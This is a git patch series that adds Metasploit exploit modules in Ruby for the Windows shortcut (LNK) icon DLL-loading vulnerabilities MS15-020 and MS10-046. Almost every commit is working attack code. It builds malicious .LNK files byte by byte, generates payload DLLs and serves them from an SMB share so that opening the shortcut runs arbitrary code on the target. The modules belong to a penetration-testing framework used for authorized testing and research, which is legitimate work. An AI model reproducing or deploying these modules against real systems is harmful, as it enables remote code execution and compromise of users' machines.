From 5662e5c5a6dc6fb9a06d645df6c738d1721fcbd2 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 11 Mar 2015 17:29:02 -0500 Subject: [PATCH 1/6] Add module for MS15-020 --- .../ms15_020_shortcut_icon_dllloader.rb | 158 ++++++++++++++++++ 1 file changed, 158 insertions(+) create mode 100644 modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb diff --git a/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb b/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb new file mode 100644 index 0000000000..2fa2c0dc67 --- /dev/null +++ b/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb @@ -0,0 +1,158 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::FILEFORMAT + include Msf::Exploit::EXE + + attr_accessor :dll_base_name + attr_accessor :exploit_dll_base_name + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Microsoft Windows Shell LNK Code Execution', + 'Description' => %q{ + This module exploits a vulnerability in the handling of Windows + Shortcut files (.LNK) that contain an icon resource pointing to a + malicious DLL. This module creates a WebDAV service that can be used + to run an arbitrary payload when accessed as a UNC path. + }, + 'Author' => + [ + 'Michael Heerklotz', # Vulnerability discovery + 'juan vazquez' # msf module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2015-0096'], + ['MSB', 'MS15-020'], + ['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Full-details-on-CVE-2015-0096-and-the-failed-MS10-046-Stuxnet/ba-p/6718459#.VQBOymTF9so'] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Payload' => + { + 'Space' => 2048, + }, + 'Platform' => 'win', + 'Targets' => + [ + ['Automatic', { }] + ], + 'DisclosureDate' => 'Mar 10 2015', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('FILENAME', [true, 'The LNK file', 'msf.lnk']), + OptString.new('UNCHOST', [true, 'The host portion of the UNC path to provide to clients (ex: 1.2.3.4).']), + OptString.new('UNCSHARE', [true, 'The share folder portion of the UNC path to provide to clients (ex: share).']), + ], self.class) + end + + def smb_host + "\\\\#{datastore['UNCHOST']}\\#{datastore['UNCSHARE']}\\" + end + + def exploit_dll_filename + name_length = 257 - (smb_host.length + 4 + 2) + + self.dll_base_name = dll_base_name || rand_text_alpha(1) + self.exploit_dll_base_name = exploit_dll_base_name || rand_text_alpha(name_length) + + "#{dll_base_name} #{exploit_dll_base_name}.dll" + end + + def dll_filename + self.dll_base_name = dll_base_name || rand_text_alpha(1) + + "#{dll_base_name}.dll" + end + + def dll_create(data) + unless ::File.directory?(Msf::Config.local_directory) + FileUtils.mkdir_p(Msf::Config.local_directory) + end + path = File.join(Msf::Config.local_directory, dll_filename) + full_path = ::File.expand_path(path) + File.open(full_path, 'wb') { |fd| fd.write(data) } + + print_good "DLL with payload stored at #{full_path}" + end + + def exploit_dll_create(data) + unless ::File.directory?(Msf::Config.local_directory) + FileUtils.mkdir_p(Msf::Config.local_directory) + end + path = File.join(Msf::Config.local_directory, exploit_dll_filename) + full_path = ::File.expand_path(path) + File.open(full_path, 'wb') { |fd| fd.write(data) } + + print_good "Fake dll to exploit stored at #{full_path}" + end + + def exploit + dll = generate_payload_dll + dll_create(dll) + exploit_dll_create(dll) + + lnk = generate_link("#{smb_host}#{exploit_dll_filename}") + file_create(lnk) + end + + # stolen from ms10_046_shortcut_icon_dllloader, all the credits to the original authors: 'hdm', 'jduck', 'B_H' + def generate_link(unc) + uni_unc = unc.unpack('C*').pack('v*') + path = '' + path << [ + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 + ].pack('C*') + path << uni_unc + + # LinkHeader + ret = [ + 0x4c, 0x00, 0x00, 0x00, 0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x46, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 + ].pack('C*') + + idlist_data = '' + idlist_data << [0x12 + 2].pack('v') + idlist_data << [ + 0x1f, 0x00, 0xe0, 0x4f, 0xd0, 0x20, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xd8, 0x08, 0x00, 0x2b, 0x30, + 0x30, 0x9d + ].pack('C*') + idlist_data << [0x12 + 2].pack('v') + idlist_data << [ + 0x2e, 0x1e, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30, + 0x30, 0x9d + ].pack('C*') + idlist_data << [path.length + 2].pack('v') + idlist_data << path + idlist_data << [0x00].pack('v') # TERMINAL WOO + + # LinkTargetIDList + ret << [idlist_data.length].pack('v') # IDListSize + ret << idlist_data + + # ExtraData blocks (none) + ret << [rand(4)].pack('V') + + # Patch in the LinkFlags + ret[0x14, 4] = ['10000001000000000000000000000000'.to_i(2)].pack('N') + + ret + end +end From 4e6aca020972f01ece82af5349e11a5c8e850b03 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 11 Mar 2015 18:13:09 -0500 Subject: [PATCH 2/6] refactor create_exploit_file --- .../ms15_020_shortcut_icon_dllloader.rb | 17 +++++++++-------- 1 file changed, 9 insertions(+), 8 deletions(-) diff --git a/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb b/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb index 2fa2c0dc67..ba39375bb2 100644 --- a/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb +++ b/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb @@ -78,24 +78,25 @@ class Metasploit3 < Msf::Exploit::Remote "#{dll_base_name}.dll" end - def dll_create(data) + def create_exploit_file(file_name, data) unless ::File.directory?(Msf::Config.local_directory) FileUtils.mkdir_p(Msf::Config.local_directory) end - path = File.join(Msf::Config.local_directory, dll_filename) + path = File.join(Msf::Config.local_directory, file_name) full_path = ::File.expand_path(path) File.open(full_path, 'wb') { |fd| fd.write(data) } + full_path + end + + def dll_create(data) + full_path = create_exploit_file(dll_filename, data) + print_good "DLL with payload stored at #{full_path}" end def exploit_dll_create(data) - unless ::File.directory?(Msf::Config.local_directory) - FileUtils.mkdir_p(Msf::Config.local_directory) - end - path = File.join(Msf::Config.local_directory, exploit_dll_filename) - full_path = ::File.expand_path(path) - File.open(full_path, 'wb') { |fd| fd.write(data) } + full_path = create_exploit_file(exploit_dll_filename, data) print_good "Fake dll to exploit stored at #{full_path}" end From 0e4e264325f8a19bc559e2a3434509c5640f8504 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 11 Mar 2015 18:19:28 -0500 Subject: [PATCH 3/6] Redo description --- .../fileformat/ms15_020_shortcut_icon_dllloader.rb | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb b/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb index ba39375bb2..502577dfd9 100644 --- a/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb +++ b/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb @@ -18,10 +18,12 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Microsoft Windows Shell LNK Code Execution', 'Description' => %q{ - This module exploits a vulnerability in the handling of Windows - Shortcut files (.LNK) that contain an icon resource pointing to a - malicious DLL. This module creates a WebDAV service that can be used - to run an arbitrary payload when accessed as a UNC path. + This module exploits a vulnerability in the MS10-046 patch to abuse (again) the handling + of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious + DLL. This module creates the required files to exploit the vulnerability. They must be + uploaded to an UNC path accessible by the target. This module has been tested successfully + on Windows 2003 SP2 with MS10-046 installed and Windows 2008 SP2 (32 bits) with MS14-027 + installed. }, 'Author' => [ From a9fa2d25aa52434f2ac571d0ae9ef59d6b548abc Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 11 Mar 2015 23:23:56 -0500 Subject: [PATCH 4/6] Add SMB module for MS10-046 --- .../smb/ms10_046_shortcut_icon_dllloader.rb | 125 ++++++++++++++++++ 1 file changed, 125 insertions(+) create mode 100644 modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb diff --git a/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb b/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb new file mode 100644 index 0000000000..8c5e68d44e --- /dev/null +++ b/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb @@ -0,0 +1,125 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::EXE + include Msf::Exploit::FILEFORMAT + include Msf::Exploit::Remote::SMB::Server::Share + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Microsoft Windows Shell LNK Code Execution', + 'Description' => %q{ + This module exploits a vulnerability in the handling of Windows + Shortcut files (.LNK) that contain an icon resource pointing to a + malicious DLL. This creates an SMB resource to provide the payload + inside a DLL, and generates a LNK file which must be sent to the + target. + }, + 'Author' => + [ + 'hdm', # Module itself + 'jduck', # WebDAV implementation, UNCHOST var + 'B_H' # Clean LNK template + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2010-2568'], + ['OSVDB', '66387'], + ['MSB', 'MS10-046'], + ['URL', 'http://www.microsoft.com/technet/security/advisory/2286198.mspx'] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Payload' => + { + 'Space' => 2048, + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Automatic', { } ] + ], + 'DisclosureDate' => 'Jul 16 2010', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('FILENAME', [true, 'The LNK file', 'msf.lnk']) + ], self.class) + + register_advanced_options( + [ + OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', false]) + ], self.class) + + deregister_options('FILE_CONTENTS', 'FILE_NAME') + end + + def setup + super + + self.file_contents = generate_payload_dll + self.file_name = "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll" + print_status("File available on #{unc}...") + end + + def primer + lnk = generate_link(unc) + file_create(lnk) + end + + def generate_link(unc) + uni_unc = unc.unpack('C*').pack('v*') + path = '' + path << [ + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 + ].pack('C*') + path << uni_unc + + # LinkHeader + ret = [ + 0x4c, 0x00, 0x00, 0x00, 0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x46, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 + ].pack('C*') + + idlist_data = '' + idlist_data << [0x12 + 2].pack('v') + idlist_data << [ + 0x1f, 0x00, 0xe0, 0x4f, 0xd0, 0x20, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xd8, 0x08, 0x00, 0x2b, 0x30, + 0x30, 0x9d + ].pack('C*') + idlist_data << [0x12 + 2].pack('v') + idlist_data << [ + 0x2e, 0x1e, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30, + 0x30, 0x9d + ].pack('C*') + idlist_data << [path.length + 2].pack('v') + idlist_data << path + idlist_data << [0x00].pack('v') # TERMINAL WOO + + # LinkTargetIDList + ret << [idlist_data.length].pack('v') # IDListSize + ret << idlist_data + + # ExtraData blocks (none) + ret << [rand(4)].pack('V') + + # Patch in the LinkFlags + ret[0x14, 4] = ['10000001000000000000000000000000'.to_i(2)].pack('N') + ret + end +end From 68d69177ad4b8572ae60d48a5393fa0d170537d3 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 11 Mar 2015 23:46:50 -0500 Subject: [PATCH 5/6] Add smb module for MS15-020 --- .../smb/ms10_046_shortcut_icon_dllloader.rb | 1 + .../smb/ms15_020_shortcut_icon_dllloader.rb | 138 ++++++++++++++++++ 2 files changed, 139 insertions(+) create mode 100644 modules/exploits/windows/smb/ms15_020_shortcut_icon_dllloader.rb diff --git a/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb b/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb index 8c5e68d44e..bd5089e22a 100644 --- a/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb +++ b/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb @@ -76,6 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote def primer lnk = generate_link(unc) file_create(lnk) + print_status('The LNK file must be sent or shared with the target...') end def generate_link(unc) diff --git a/modules/exploits/windows/smb/ms15_020_shortcut_icon_dllloader.rb b/modules/exploits/windows/smb/ms15_020_shortcut_icon_dllloader.rb new file mode 100644 index 0000000000..1bed288b79 --- /dev/null +++ b/modules/exploits/windows/smb/ms15_020_shortcut_icon_dllloader.rb @@ -0,0 +1,138 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::EXE + include Msf::Exploit::FILEFORMAT + include Msf::Exploit::Remote::SMB::Server::Share + + attr_accessor :exploit_dll_name + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Microsoft Windows Shell LNK Code Execution', + 'Description' => %q{ + This module exploits a vulnerability in the MS10-046 patch to abuse (again) the handling + of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious + DLL. This creates an SMB resource to provide the payload and the trigger, and generates a + LNK file which must be sent to the target. This module has been tested successfully on + Windows 2003 SP2 with MS10-046 installed and Windows 2008 SP2 (32 bits) with MS14-027 + installed. + }, + 'Author' => + [ + 'Michael Heerklotz', # Vulnerability discovery + 'juan vazquez' # msf module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2015-0096'], + ['MSB', 'MS15-020'], + ['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Full-details-on-CVE-2015-0096-and-the-failed-MS10-046-Stuxnet/ba-p/6718459#.VQBOymTF9so'] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Payload' => + { + 'Space' => 2048, + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Automatic', { } ] + ], + 'DisclosureDate' => 'Mar 10 2015', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('FILENAME', [true, 'The LNK file', 'msf.lnk']) + ], self.class) + + register_advanced_options( + [ + OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', false]) + ], self.class) + + deregister_options('FILE_CONTENTS', 'FILE_NAME') + end + + def smb_host + "\\\\#{srvhost}\\#{share}\\" + end + + + def setup + super + + self.file_contents = generate_payload_dll + random_char = rand_text_alpha(1) + self.file_name = "#{random_char}.dll" + prefix = "#{random_char} " + random_length = 257 - smb_host.length - file_name.length - prefix.length + self.exploit_dll_name = "#{prefix}#{rand_text_alpha(random_length)}#{file_name}" + + print_status("Payload available on #{unc}...") + print_status("Trigger available on #{smb_host}#{exploit_dll_name}...") + end + + def primer + lnk = generate_link("#{smb_host}#{exploit_dll_name}") + file_create(lnk) + print_status('The LNK file must be sent or shared with the target...') + end + + def generate_link(unc) + uni_unc = unc.unpack('C*').pack('v*') + path = '' + path << [ + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 + ].pack('C*') + path << uni_unc + + # LinkHeader + ret = [ + 0x4c, 0x00, 0x00, 0x00, 0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x46, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 + ].pack('C*') + + idlist_data = '' + idlist_data << [0x12 + 2].pack('v') + idlist_data << [ + 0x1f, 0x00, 0xe0, 0x4f, 0xd0, 0x20, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xd8, 0x08, 0x00, 0x2b, 0x30, + 0x30, 0x9d + ].pack('C*') + idlist_data << [0x12 + 2].pack('v') + idlist_data << [ + 0x2e, 0x1e, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30, + 0x30, 0x9d + ].pack('C*') + idlist_data << [path.length + 2].pack('v') + idlist_data << path + idlist_data << [0x00].pack('v') # TERMINAL WOO + + # LinkTargetIDList + ret << [idlist_data.length].pack('v') # IDListSize + ret << idlist_data + + # ExtraData blocks (none) + ret << [rand(4)].pack('V') + + # Patch in the LinkFlags + ret[0x14, 4] = ['10000001000000000000000000000000'.to_i(2)].pack('N') + ret + end +end From 67d05f93546fc033db0a5457180fcdab8f723f70 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 12 Mar 2015 10:51:01 -0500 Subject: [PATCH 6/6] Add the PR as a reference (how to guide) --- .../windows/fileformat/ms15_020_shortcut_icon_dllloader.rb | 3 ++- .../exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb | 3 ++- .../exploits/windows/smb/ms15_020_shortcut_icon_dllloader.rb | 3 ++- 3 files changed, 6 insertions(+), 3 deletions(-) diff --git a/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb b/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb index 502577dfd9..66df942f10 100644 --- a/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb +++ b/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb @@ -35,7 +35,8 @@ class Metasploit3 < Msf::Exploit::Remote [ ['CVE', '2015-0096'], ['MSB', 'MS15-020'], - ['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Full-details-on-CVE-2015-0096-and-the-failed-MS10-046-Stuxnet/ba-p/6718459#.VQBOymTF9so'] + ['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Full-details-on-CVE-2015-0096-and-the-failed-MS10-046-Stuxnet/ba-p/6718459#.VQBOymTF9so'], + ['URL', 'https://github.com/rapid7/metasploit-framework/pull/4911'] # How to guide here ], 'DefaultOptions' => { diff --git a/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb b/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb index bd5089e22a..7afff33985 100644 --- a/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb +++ b/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb @@ -34,7 +34,8 @@ class Metasploit3 < Msf::Exploit::Remote ['CVE', '2010-2568'], ['OSVDB', '66387'], ['MSB', 'MS10-046'], - ['URL', 'http://www.microsoft.com/technet/security/advisory/2286198.mspx'] + ['URL', 'http://www.microsoft.com/technet/security/advisory/2286198.mspx'], + ['URL', 'https://github.com/rapid7/metasploit-framework/pull/4911'] # How to guide here ], 'DefaultOptions' => { diff --git a/modules/exploits/windows/smb/ms15_020_shortcut_icon_dllloader.rb b/modules/exploits/windows/smb/ms15_020_shortcut_icon_dllloader.rb index 1bed288b79..780604be72 100644 --- a/modules/exploits/windows/smb/ms15_020_shortcut_icon_dllloader.rb +++ b/modules/exploits/windows/smb/ms15_020_shortcut_icon_dllloader.rb @@ -35,7 +35,8 @@ class Metasploit3 < Msf::Exploit::Remote [ ['CVE', '2015-0096'], ['MSB', 'MS15-020'], - ['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Full-details-on-CVE-2015-0096-and-the-failed-MS10-046-Stuxnet/ba-p/6718459#.VQBOymTF9so'] + ['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Full-details-on-CVE-2015-0096-and-the-failed-MS10-046-Stuxnet/ba-p/6718459#.VQBOymTF9so'], + ['URL', 'https://github.com/rapid7/metasploit-framework/pull/4911'] # How to guide here ], 'DefaultOptions' => {